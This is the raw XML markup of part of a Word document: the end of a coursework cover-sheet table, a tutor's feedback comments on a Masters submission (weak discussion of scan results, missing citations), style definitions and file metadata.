              <w:t>Up to four weeks late</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="425" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="64055C8C" w14:textId="77777777" w:rsidR="00976736" w:rsidRPr="00976736" w:rsidRDefault="00976736" w:rsidP="00976736">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Arial"/>
                <w:sz w:val="12"/>
                <w:szCs w:val="12"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="41" w:name="fourWeeksLate"/>
            <w:bookmarkEnd w:id="41"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276" w:type="dxa"/>
            <w:vMerge/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="3CBC5827" w14:textId="77777777" w:rsidR="00976736" w:rsidRPr="00976736" w:rsidRDefault="00976736" w:rsidP="00976736">
            <w:pPr>
              <w:ind w:leftChars="71" w:left="170"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00976736" w:rsidRPr="00976736" w14:paraId="4C24BA12" w14:textId="77777777" w:rsidTr="00D3092C">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6062" w:type="dxa"/>
            <w:vMerge/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="1A0BF832" w14:textId="77777777" w:rsidR="00976736" w:rsidRPr="00976736" w:rsidRDefault="00976736" w:rsidP="00976736">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2903" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="583D6690" w14:textId="77777777" w:rsidR="00976736" w:rsidRPr="00976736" w:rsidRDefault="00976736" w:rsidP="00976736">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00976736">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Arial"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
              <w:t>First Attempt?</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="425" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="46947855" w14:textId="77777777" w:rsidR="00976736" w:rsidRPr="00976736" w:rsidRDefault="00976736" w:rsidP="00976736">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Arial"/>
                <w:sz w:val="12"/>
                <w:szCs w:val="12"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
            <w:bookmarkStart w:id="42" w:name="firstAttempt"/>
            <w:bookmarkEnd w:id="42"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1276" w:type="dxa"/>
            <w:vMerge/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="48D91C6F" w14:textId="77777777" w:rsidR="00976736" w:rsidRPr="00976736" w:rsidRDefault="00976736" w:rsidP="00976736">
            <w:pPr>
              <w:ind w:firstLineChars="141" w:firstLine="282"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:eastAsia="en-GB"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="38032606" w14:textId="77777777" w:rsidR="00976736" w:rsidRPr="00976736" w:rsidRDefault="00976736" w:rsidP="00976736">
      <w:pPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E8009EE" w14:textId="29F40361" w:rsidR="00A446EC" w:rsidRPr="00F05BE8" w:rsidRDefault="00A446EC" w:rsidP="00CC1C29">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1036"/>
        </w:tabs>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00A446EC" w:rsidRPr="00F05BE8" w:rsidSect="00C57238">
      <w:footerReference w:type="default" r:id="rId26"/>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Carlene Campbell" w:date="2018-01-04T18:07:00Z" w:initials="CC">
    <w:p w14:paraId="4C551846" w14:textId="77777777" w:rsidR="000C4E8B" w:rsidRDefault="000C4E8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No reference citation in this section.</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:id="4" w:author="Carlene Campbell" w:date="2018-01-04T18:09:00Z" w:initials="CC">
    <w:p w14:paraId="77910693" w14:textId="1A15CB02" w:rsidR="000C4E8B" w:rsidRDefault="000C4E8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This section requires more reading and discussion, very basic for </w:t>
      </w:r>
      <w:r w:rsidR="00976736">
        <w:t>Masters</w:t>
      </w:r>
      <w:bookmarkStart w:id="5" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r>
        <w:t xml:space="preserve"> level.</w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:id="10" w:author="Carlene Campbell" w:date="2018-01-04T18:19:00Z" w:initials="CC">
    <w:p w14:paraId="11B62ABE" w14:textId="77777777" w:rsidR="000C4E8B" w:rsidRDefault="000C4E8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This section shows the scan results in the appendix but discuss in a basic manner.  Requires more focused and critical analysis.  Need to make sound judgements and convincing augments.  </w:t>
      </w:r>
    </w:p>
  </w:comment>
  <w:comment w:id="12" w:author="Carlene Campbell" w:date="2018-01-04T18:13:00Z" w:initials="CC">
    <w:p w14:paraId="14927FE3" w14:textId="77777777" w:rsidR="000C4E8B" w:rsidRDefault="000C4E8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Appendix C shows the scan but not much discussion and evaluation of the scan done in this section.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C551846" w15:done="0"/>
  <w15:commentEx w15:paraId="77910693" w15:done="0"/>
  <w15:commentEx w15:paraId="11B62ABE" w15:done="0"/>
  <w15:commentEx w15:paraId="14927FE3"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D673B7" w14:textId="77777777" w:rsidR="00C57238" w:rsidRDefault="00976736">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21</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:b/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
  </w:p>
  <w:p w14:paraId="1D2234E2" w14:textId="77777777" w:rsidR="00C57238" w:rsidRDefault="00976736">
    <w:pPr>
      <w:pStyle w:val="Footer1"/>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0936DD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F6385D7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21C"/>
    <w:rsid w:val="000042DC"/>
    <w:rsid w:val="00017C4C"/>
    <w:rsid w:val="000B668C"/>
    <w:rsid w:val="000B751C"/>
    <w:rsid w:val="000C4E8B"/>
    <w:rsid w:val="00124EDF"/>
    <w:rsid w:val="001A25ED"/>
    <w:rsid w:val="001A4DB6"/>
    <w:rsid w:val="001B121C"/>
    <w:rsid w:val="001C3504"/>
    <w:rsid w:val="002165F2"/>
    <w:rsid w:val="00236B28"/>
    <w:rsid w:val="002B1F54"/>
    <w:rsid w:val="002C0560"/>
    <w:rsid w:val="002C13B1"/>
    <w:rsid w:val="003123EE"/>
    <w:rsid w:val="00333753"/>
    <w:rsid w:val="003C1AA1"/>
    <w:rsid w:val="00412AE7"/>
    <w:rsid w:val="004236EA"/>
    <w:rsid w:val="00425F16"/>
    <w:rsid w:val="00471E5B"/>
    <w:rsid w:val="00507B76"/>
    <w:rsid w:val="00572AC2"/>
    <w:rsid w:val="0058527C"/>
    <w:rsid w:val="00591C89"/>
    <w:rsid w:val="00597484"/>
    <w:rsid w:val="005B1BB0"/>
    <w:rsid w:val="005C0E93"/>
    <w:rsid w:val="006059FB"/>
    <w:rsid w:val="006178D2"/>
    <w:rsid w:val="0062047E"/>
    <w:rsid w:val="006323FF"/>
    <w:rsid w:val="006476AE"/>
    <w:rsid w:val="0066017F"/>
    <w:rsid w:val="00667DEF"/>
    <w:rsid w:val="006B753E"/>
    <w:rsid w:val="007529A3"/>
    <w:rsid w:val="00782D79"/>
    <w:rsid w:val="007C4513"/>
    <w:rsid w:val="007D169E"/>
    <w:rsid w:val="00820336"/>
    <w:rsid w:val="008A3D97"/>
    <w:rsid w:val="008B2BB4"/>
    <w:rsid w:val="008B4734"/>
    <w:rsid w:val="00976736"/>
    <w:rsid w:val="009D4CB1"/>
    <w:rsid w:val="00A354EC"/>
    <w:rsid w:val="00A35A0D"/>
    <w:rsid w:val="00A446EC"/>
    <w:rsid w:val="00AF0EDF"/>
    <w:rsid w:val="00B00BAF"/>
    <w:rsid w:val="00B15795"/>
    <w:rsid w:val="00B1698A"/>
    <w:rsid w:val="00B31F6C"/>
    <w:rsid w:val="00B664F9"/>
    <w:rsid w:val="00B73058"/>
    <w:rsid w:val="00B74EC3"/>
    <w:rsid w:val="00BF64D1"/>
    <w:rsid w:val="00C24692"/>
    <w:rsid w:val="00C44C3A"/>
    <w:rsid w:val="00C51864"/>
    <w:rsid w:val="00C65DB3"/>
    <w:rsid w:val="00C72627"/>
    <w:rsid w:val="00CA149E"/>
    <w:rsid w:val="00CC1C29"/>
    <w:rsid w:val="00CC1D23"/>
    <w:rsid w:val="00CD001E"/>
    <w:rsid w:val="00D77CC6"/>
    <w:rsid w:val="00DB63F1"/>
    <w:rsid w:val="00DE459D"/>
    <w:rsid w:val="00DF4FD8"/>
    <w:rsid w:val="00DF7E71"/>
    <w:rsid w:val="00E177C3"/>
    <w:rsid w:val="00E2213C"/>
    <w:rsid w:val="00E64AC5"/>
    <w:rsid w:val="00EA0BDD"/>
    <w:rsid w:val="00ED7B17"/>
    <w:rsid w:val="00EF79D3"/>
    <w:rsid w:val="00F05BE8"/>
    <w:rsid w:val="00F14567"/>
    <w:rsid w:val="00F90ABD"/>
    <w:rsid w:val="00FF5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61325"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{0503ECC9-B920-4C34-87FF-48FD7A0EF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21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B121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121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B121C"/>
    <w:pPr>
      <w:spacing w:line="259" w:lineRule="auto"/>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC1">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:autoRedefine/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="001B121C"/>
    <w:pPr>
      <w:spacing w:after="100"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="001B121C"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00591C89"/>
    <w:rPr>
      <w:color w:val="808080"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E6E6E6"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00B15795"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NoSpacing">
    <w:name w:val="No Spacing"/>
    <w:uiPriority w:val="1"/>
    <w:qFormat/>
    <w:rsid w:val="006059FB"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="00D77C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C4E8B"/>
    <w:rPr>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="CommentText">
    <w:name w:val="annotation text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="CommentTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="000C4E8B"/>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CommentTextChar">
    <w:name w:val="Comment Text Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="CommentText"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="000C4E8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C4E8B"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CommentSubjectChar">
    <w:name w:val="Comment Subject Char"/>
    <w:basedOn w:val="CommentTextChar"/>
    <w:link w:val="CommentSubject"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="000C4E8B"/>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0C4E8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4E8B"/>
    <w:rPr>
      <w:rFonts w:ascii="Segoe UI" w:eastAsia="Times New Roman" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Footer1">
    <w:name w:val="Footer1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Footer"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00976736"/>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1"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00976736"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar1"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00976736"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4513"/>
        <w:tab w:val="right" w:pos="9026"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FooterChar1">
    <w:name w:val="Footer Char1"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Footer"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="0097673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comments" Target="comment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microsoft.com/office/2011/relationships/people" Target="peop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D7335-B021-44A2-B8A1-A4FC9871C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4887</TotalTime>
  <Pages>21</Pages>
  <Words>15698</Words>
  <Characters>89485</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>745</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dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Campbell, Carlene</cp:lastModifiedBy>
  <cp:revision>8</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-11-05T18:47:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-01-05T15:34:00Z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Unique User Id_1">
    <vt:lpwstr>c58b7f25-946e-36b6-aaa0-7682a217eaf5</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="24" name="Mendeley Citation Style_1">
    <vt:lpwstr>http://www.zotero.org/styles/ieee</vt:lpwstr>
  </property>
</Properties>
</file>